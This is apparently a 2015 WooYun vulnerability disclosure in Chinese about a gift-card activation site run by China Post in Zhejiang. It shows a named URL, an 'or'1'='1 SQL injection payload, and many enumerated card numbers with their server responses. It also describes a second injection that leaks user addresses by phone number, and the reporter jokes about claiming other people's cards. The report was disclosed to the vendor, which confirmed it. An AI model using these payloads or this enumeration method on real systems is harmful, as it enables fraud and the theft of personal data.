当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-093627

漏洞标题:中国邮政某公司礼品卡系统sql注入外加遍历用户信息

相关厂商:中国邮政集团公司信息技术局

漏洞作者: 浮世浮城

提交时间:2015-01-24 12:34

修复时间:2015-03-10 12:36

公开时间:2015-03-10 12:36

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-01-24: 细节已通知厂商并且等待厂商处理中
2015-01-24: 厂商已经确认,细节仅向厂商公开
2015-02-03: 细节向核心白帽子及相关领域专家公开
2015-02-13: 细节向普通白帽子公开
2015-02-23: 细节向实习白帽子公开
2015-03-10: 细节向公众公开

简要描述:

我这里只测试了000到999
这卡是1月31日前面要激活的
不激活过期
我看了一下大概700多份没激活...
要不给我来一份...

详细说明:

单位发了2张卡
让我们1月31号之前激活领取
我就寻思着试试
这里我测试的号码是2种
第一种海鲜组合320150804***价值300
第二种坚果组合320150904***价值350
问题url:http://www.zjpost.com/gift/tbCardActive.action

QQ截图20141123214409.png


礼品卡激活这里先随便填写密码乱输入看看提示 密码不匹配

QQ截图20141123214456.png


那我们在号码后面加上'or'1'='1试试 提示已经激活

QQ截图20141123214547.png


那我在换个号码后面加上'or'1'='1试试 可以进去 可以提交资料

QQ截图20141123214610.png


也就是说我要是填写了地址电话什么的 就意味着拿着999的这张卡的人就不能激活了.
赶紧做个字典用神器分别跑一下
先跑海鲜的000-999的人
189个人领取了

QQ截图20141123214142.png


798个人还没有领取 1月31就结束了 你们不领取要不小弟帮你们代劳激活一下?

QQ截图20141123214216.png


在跑一下坚果的人同样 000-999
285个人领取了

QQ截图20141123223456.png


710个小伙伴还没领取

QQ截图20141123223543.png


随机测试几个 坚果的领取的
320150904359'or'1'='1 200 false false 7104
320150904361'or'1'='1 200 false false 7104
320150904358'or'1'='1 200 false false 7104
320150904363'or'1'='1 200 false false 7104
320150904350'or'1'='1 200 false false 7104
320150904365'or'1'='1 200 false false 7104
320150904353'or'1'='1 200 false false 7104
320150904362'or'1'='1 200 false false 7104
320150904367'or'1'='1 200 false false 7104
320150904369'or'1'='1 200 false false 7104
320150904360'or'1'='1 200 false false 7104
320150904371'or'1'='1 200 false false 7104
320150904372'or'1'='1 200 false false 7104
320150904373'or'1'='1 200 false false 7104
320150904368'or'1'='1 200 false false 7104
320150904376'or'1'='1 200 false false 7104
320150904379'or'1'='1 200 false false 7104
320150904364'or'1'='1 200 false false 7104
320150904370'or'1'='1 200 false false 7104
320150904378'or'1'='1 200 false false 7104
320150904381'or'1'='1 200 false false 7104
320150904382'or'1'='1 200 false false 7104
320150904383'or'1'='1 200 false false 7104
320150904386'or'1'='1 200 false false 7104
320150904385'or'1'='1 200 false false 7104
320150904389'or'1'='1 200 false false 7104
320150904387'or'1'='1 200 false false 7104
320150904380'or'1'='1 200 false false 7104
320150904388'or'1'='1 200 false false 7104
320150904393'or'1'='1 200 false false 7104
320150904384'or'1'='1 200 false false 7104
320150904396'or'1'='1 200 false false 7104
320150904394'or'1'='1 200 false false 7104
320150904397'or'1'='1 200 false false 7104
320150904399'or'1'='1 200 false false 7104
320150904398'or'1'='1 200 false false 7104
320150904391'or'1'='1 200 false false 7104
没有领取的
320150904536'or'1'='1 200 false false 12957
320150904537'or'1'='1 200 false false 12957
320150904538'or'1'='1 200 false false 12957
320150904474'or'1'='1 200 false false 12957
320150904539'or'1'='1 200 false false 12957
320150904541'or'1'='1 200 false false 12957
320150904542'or'1'='1 200 false false 12957
320150904544'or'1'='1 200 false false 12957
320150904545'or'1'='1 200 false false 12957
320150904546'or'1'='1 200 false false 12957
320150904547'or'1'='1 200 false false 12957
320150904548'or'1'='1 200 false false 12957
320150904540'or'1'='1 200 false false 12957
320150904530'or'1'='1 200 false false 12957
320150904551'or'1'='1 200 false false 12957
320150904552'or'1'='1 200 false false 12957
320150904549'or'1'='1 200 false false 12957
320150904554'or'1'='1 200 false false 12957
320150904553'or'1'='1 200 false false 12957
320150904555'or'1'='1 200 false false 12957
320150904556'or'1'='1 200 false false 12957
320150904557'or'1'='1 200 false false 12957
320150904559'or'1'='1 200 false false 12957
320150904561'or'1'='1 200 false false 12957
320150904550'or'1'='1 200 false false 12957
320150904562'or'1'='1 200 false false 12957
320150904558'or'1'='1 200 false false 12957
320150904543'or'1'='1 200 false false 12957
320150904563'or'1'='1 200 false false 12957
320150904564'or'1'='1 200 false false 12957
320150904565'or'1'='1 200 false false 12957
320150904567'or'1'='1 200 false false 12957
320150904568'or'1'='1 200 false false 12957
320150904569'or'1'='1 200 false false 12957
320150904560'or'1'='1 200 false false 12957
320150904571'or'1'='1 200 false false 12957
320150904574'or'1'='1 200 false false 12957
全部复制出来就这个都要57页 厂商有兴趣可以问我拿 你们可以测试一下是不是没有领取的或者已经领取的 你们后台一查就知道
接下来是遍历用户信息了
我发现只要号码在你们数据里面填写过 就会直接被记录 也就是我输入的号码只要是你们里面有的 就自己会跳出地址
测试

QQ截图20141123220549.png


换个号码

QQ截图20141123220640.png


貌似这里也有注入
输入1'or'1'='1
也会跳出一个地址

QQ截图20141123220657.png


抓包看一下 原来在手机这里输入后自动会跳转一下
也就是说 我只要导入全省的手机号码 就能把数据库里面有的手机对应的地址全部遍历出来

QQ截图20141123220726.png

漏洞证明:

单位发了2张卡
让我们1月31号之前激活领取
我就寻思着试试
这里我测试的号码是2种
第一种海鲜组合320150804***价值300
第二种坚果组合320150904***价值350
问题url:http://www.zjpost.com/gift/tbCardActive.action

QQ截图20141123214409.png


礼品卡激活这里先随便填写密码乱输入看看提示 密码不匹配

QQ截图20141123214456.png


那我们在号码后面加上'or'1'='1试试 提示已经激活

QQ截图20141123214547.png


那我在换个号码后面加上'or'1'='1试试 可以进去 可以提交资料

QQ截图20141123214610.png


也就是说我要是填写了地址电话什么的 就意味着拿着999的这张卡的人就不能激活了.
赶紧做个字典用神器分别跑一下
先跑海鲜的000-999的人
189个人领取了

QQ截图20141123214142.png


798个人还没有领取 1月31就结束了 你们不领取要不小弟帮你们代劳激活一下?

QQ截图20141123214216.png


在跑一下坚果的人同样 000-999
285个人领取了

QQ截图20141123223456.png


710个小伙伴还没领取

QQ截图20141123223543.png


随机测试几个 坚果的领取的
320150904359'or'1'='1 200 false false 7104
320150904361'or'1'='1 200 false false 7104
320150904358'or'1'='1 200 false false 7104
320150904363'or'1'='1 200 false false 7104
320150904350'or'1'='1 200 false false 7104
320150904365'or'1'='1 200 false false 7104
320150904353'or'1'='1 200 false false 7104
320150904362'or'1'='1 200 false false 7104
320150904367'or'1'='1 200 false false 7104
320150904369'or'1'='1 200 false false 7104
320150904360'or'1'='1 200 false false 7104
320150904371'or'1'='1 200 false false 7104
320150904372'or'1'='1 200 false false 7104
320150904373'or'1'='1 200 false false 7104
320150904368'or'1'='1 200 false false 7104
320150904376'or'1'='1 200 false false 7104
320150904379'or'1'='1 200 false false 7104
320150904364'or'1'='1 200 false false 7104
320150904370'or'1'='1 200 false false 7104
320150904378'or'1'='1 200 false false 7104
320150904381'or'1'='1 200 false false 7104
320150904382'or'1'='1 200 false false 7104
320150904383'or'1'='1 200 false false 7104
320150904386'or'1'='1 200 false false 7104
320150904385'or'1'='1 200 false false 7104
320150904389'or'1'='1 200 false false 7104
320150904387'or'1'='1 200 false false 7104
320150904380'or'1'='1 200 false false 7104
320150904388'or'1'='1 200 false false 7104
320150904393'or'1'='1 200 false false 7104
320150904384'or'1'='1 200 false false 7104
320150904396'or'1'='1 200 false false 7104
320150904394'or'1'='1 200 false false 7104
320150904397'or'1'='1 200 false false 7104
320150904399'or'1'='1 200 false false 7104
320150904398'or'1'='1 200 false false 7104
320150904391'or'1'='1 200 false false 7104
没有领取的
320150904536'or'1'='1 200 false false 12957
320150904537'or'1'='1 200 false false 12957
320150904538'or'1'='1 200 false false 12957
320150904474'or'1'='1 200 false false 12957
320150904539'or'1'='1 200 false false 12957
320150904541'or'1'='1 200 false false 12957
320150904542'or'1'='1 200 false false 12957
320150904544'or'1'='1 200 false false 12957
320150904545'or'1'='1 200 false false 12957
320150904546'or'1'='1 200 false false 12957
320150904547'or'1'='1 200 false false 12957
320150904548'or'1'='1 200 false false 12957
320150904540'or'1'='1 200 false false 12957
320150904530'or'1'='1 200 false false 12957
320150904551'or'1'='1 200 false false 12957
320150904552'or'1'='1 200 false false 12957
320150904549'or'1'='1 200 false false 12957
320150904554'or'1'='1 200 false false 12957
320150904553'or'1'='1 200 false false 12957
320150904555'or'1'='1 200 false false 12957
320150904556'or'1'='1 200 false false 12957
320150904557'or'1'='1 200 false false 12957
320150904559'or'1'='1 200 false false 12957
320150904561'or'1'='1 200 false false 12957
320150904550'or'1'='1 200 false false 12957
320150904562'or'1'='1 200 false false 12957
320150904558'or'1'='1 200 false false 12957
320150904543'or'1'='1 200 false false 12957
320150904563'or'1'='1 200 false false 12957
320150904564'or'1'='1 200 false false 12957
320150904565'or'1'='1 200 false false 12957
320150904567'or'1'='1 200 false false 12957
320150904568'or'1'='1 200 false false 12957
320150904569'or'1'='1 200 false false 12957
320150904560'or'1'='1 200 false false 12957
320150904571'or'1'='1 200 false false 12957
320150904574'or'1'='1 200 false false 12957
全部复制出来就这个都要57页 厂商有兴趣可以问我拿 你们可以测试一下是不是没有领取的或者已经领取的 你们后台一查就知道
接下来是遍历用户信息了
我发现只要号码在你们数据里面填写过 就会直接被记录 也就是我输入的号码只要是你们里面有的 就自己会跳出地址
测试

QQ截图20141123220549.png


换个号码

QQ截图20141123220640.png


貌似这里也有注入
输入1'or'1'='1
也会跳出一个地址

QQ截图20141123220657.png


抓包看一下 原来在手机这里输入后自动会跳转一下
也就是说 我只要导入全省的手机号码 就能把数据库里面有的手机对应的地址全部遍历出来

QQ截图20141123220726.png

修复方案:

修复

版权声明:转载请注明来源 浮世浮城@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-01-24 14:37

厂商回复:

谢谢。

最新状态:

暂无